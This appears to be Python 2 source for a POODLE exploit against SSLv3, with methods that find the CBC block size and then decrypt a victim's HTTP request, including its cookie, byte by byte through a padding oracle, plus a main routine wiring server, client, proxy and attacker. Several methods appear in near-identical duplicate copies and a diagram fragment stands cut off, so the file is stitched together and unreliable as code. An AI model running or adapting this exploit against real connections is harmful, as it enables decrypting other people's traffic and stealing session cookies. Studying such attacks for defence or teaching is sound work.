def __init__(self, host, port):
self.proxy_host = host
self.proxy_port = port
self.cookie = "".join(
random.SystemRandom().choice(string.uppercase + string.digits + string.lowercase) for _ in xrange(15)
)
print draw("Sending request : ", bold=True, fg_yellow=True)
print draw("GET / HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n", bold=True, fg_yellow=True)
def __init__(self, host, port):
self.proxy_host = host
self.proxy_port = port
self.cookie = ''.join(
random.SystemRandom().choice(string.uppercase + string.digits +
string.lowercase) for _ in xrange(15))
print draw("Sending request : ", bold=True, fg_yellow=True)
print draw("GET / HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n",
bold=True,
fg_yellow=True)
def __init__(self, host, port):
self.proxy_host = host
self.proxy_port = port
self.cookie = ''.join(
random.SystemRandom().choice(string.uppercase + string.digits +
string.lowercase) for _ in xrange(15))
print draw("Sending request : ", bold=True, fg_yellow=True)
print draw(
"POST / HTTP/1.1\r\nUsername: securityprotocols\r\nAuth-token: SPftwboi\r\nCookie: "
+ self.cookie + "\r\n\r\n",
bold=True,
fg_yellow=True)
def run(self):
self.client_connection()
self.size_of_block()
self.start_exploit = True
# disconnect the client to avoid "connection reset by peer"
self.client_disconect()
print "Start decrypting the request..."
self.exploit()
print '\n'
print draw("%r" %(self.request), bold=True, fg_yellow=True)
print '\n'
self.client_disconect()
return
def run(self):
self.client_connection()
self.size_of_block()
self.start_exploit = True
# disconnect the client to avoid "connection reset by peer"
self.client_disconect()
print "Start decrypting the request..."
self.exploit()
print '\n'
print draw("%r" %(self.request), bold=True, fg_yellow=True)
print '\n'
self.client_disconect()
return
def exploit(self):
# start at block 1, finish at block n-2
# 0 => IV unknown, n => padding block, n-1 => MAC block
length_f = self.length_frame
n = length_f / self.length_block + 1
print "Found message length: ", length_f + self.length_block, " bytes.", "It has ", n, " blocks"
print "Provide the starting block and the ending block of the sequence you want me to decipher"
print draw("FOLLOW THE RULES BELOW!", bold=True, fg_red=True)
print draw(
"The parameters take values between block #1 and #n - 2, where n is the number of blocks for the paintext",
bold=True,
fg_yellow=True)
print draw(
"Block 0 is the IV which is unknown and irelevant. Block n - 1 is the tag used for the HMAC verification,",
bold=True,
fg_yellow=True)
print draw("The end block is greater or equal than the start block",
bold=True,
fg_yellow=True)
start_block = -1,
end_block = -1
while (start_block <= 0 or start_block >= n - 2):
start_block = int(raw_input("Start_block: "))
if (start_block <= 0 or start_block >= n - 2):
print "You did not provide a start block as in the rule above! Try again."
while (end_block < start_block or end_block > n - 2):
end_block = int(raw_input("End_block: "))
if (end_block < start_block or end_block > n - 2):
print "You did not provide a end block as in the rule above! Try again."
i = start_block
while i <= end_block:
self.current_block = i
print '\n'
print "Starting to get the plaintext from block: ", i
print '\n'
for j in range(self.length_block - 1, -1, -1):
(plain, nb_request) = self.find_plaintext_byte(self.frame, j)
self.request += plain
percent = 100.0 * self.byte_decipher / (
(end_block - start_block + 1) * self.length_block)
print draw(
"\rProgression %2.0f%% - client's request %4s - byte found: %r"
% (percent, nb_request, plain),
bold=True,
fg_green=True)
i += 1
return
def size_of_block(self):
print "Begins searching the size of a block...\n"
self.send_request_from_the_client()
reference_length = self.length_frame
i = 0
while True:
self.send_request_from_the_client(i)
current_length = self.length_frame
self.length_block = current_length - reference_length
if self.length_block != 0:
self.nb_prefix = i
print draw("CBC block size " + str(self.length_block) + "\n", bold=True)
break
i += 1
self.decipherable = False
def size_of_block(self):
print "Begins searching the size of a block...\n"
self.send_request_from_the_client()
reference_length = self.length_frame
i = 0
while True:
self.send_request_from_the_client(i)
current_length = self.length_frame
self.length_block = current_length - reference_length
if self.length_block != 0:
self.nb_prefix = i
print draw("CBC block size " + str(self.length_block) + "\n", bold=True)
break
i += 1
self.decipherable = False
def run(self):
self.client_connection()
self.size_of_block()
self.start_exploit = True
# disconnect the client to avoid "connection reset by peer"
# this can happen on longer periods of inactivity from the attacker while waiting for the result
self.client_disconect()
print "Start decrypting the request..."
self.exploit()
print '\n'
print draw("Found plaintext:%r" % (self.request),
bold=True,
fg_green=True)
print '\n'
self.client_disconect()
return
| |
^ | |
| +-----v---+------+
| | |
--+----------+ Attacker |
inject javascript | |
+----------------+
"""
parser = argparse.ArgumentParser(description='Connection with SSLv3')
parser.add_argument('host', help='hostname or IP address')
parser.add_argument('port', type=int, help='TCP port number')
parser.add_argument('-v', help='debug mode', action="store_true")
args = parser.parse_args()
print draw(plan, bold=True, fg_green=True)
server = Server(args.host, args.port)
client = Client(args.host, args.port + 1)
spy = Proxy(args.host, args.port + 1)
poodle = Poodle(client)
server.connection()
spy.connection()
poodle.run()
spy.disconnect()
server.disconnect()
